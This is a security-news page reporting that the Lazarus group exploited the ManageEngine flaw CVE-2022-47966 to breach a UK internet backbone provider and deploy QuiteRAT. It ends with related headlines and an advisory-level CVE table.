Security News > 2023 > August > Hackers use public ManageEngine exploit to breach internet org
The North Korean state-backed hacker group tracked as Lazarus has been exploiting a critical vulnerability in Zoho's ManageEngine ServiceDesk to compromise an internet backbone infrastructure provider and healthcare organizations.
Cisco Talos researchers observed attacks against UK internet firms in early 2023, when Lazarus leveraged an exploit for CVE-2022-47966, a pre-authentication remote code execution flaw affecting multiple Zoho ManageEngine products.
"In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in the United Kingdom to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access," Cisco Talos.
After exploiting the vulnerability to breach a target, Lazarus hackers dropped the QuiteRAT malware from an external URL using a curl command.
In a separate report today, Cisco Talos said that Lazarus hackers have a new malware called CollectionRAT. The new threat was found after researchers examined infrastructure the actor used in other attacks.
Lazarus hackers linked to $60 million Alphapo cryptocurrency heist.
News URL
Related news
- Hackers exploit Ray framework flaw to breach servers, hijack resources (source)
- ArcaneDoor hackers exploit Cisco zero-days to breach govt networks (source)
- Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware (source)
- Hackers Exploit Misconfigured YARN, Docker, Confluence, Redis Servers for Crypto Mining (source)
- Hackers exploit WordPress plugin flaw to infect 3,300 sites with malware (source)
- Magnet Goblin Hacker Group Leveraging 1-Day Exploits to Deploy Nerbian RAT (source)
- Hackers exploit Windows SmartScreen flaw to drop DarkGate malware (source)
- Hackers exploit Aiohttp bug to find vulnerable networks (source)
- Chinese Earth Krahang hackers breach 70 orgs in 23 countries (source)
- Russia Hackers Using TinyTurla-NG to Breach European NGO's Systems (source)
Related Vulnerability
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2023-01-18 | CVE-2022-47966 | Unspecified vulnerability in Zohocorp products Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache Santuario xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. | 9.8 |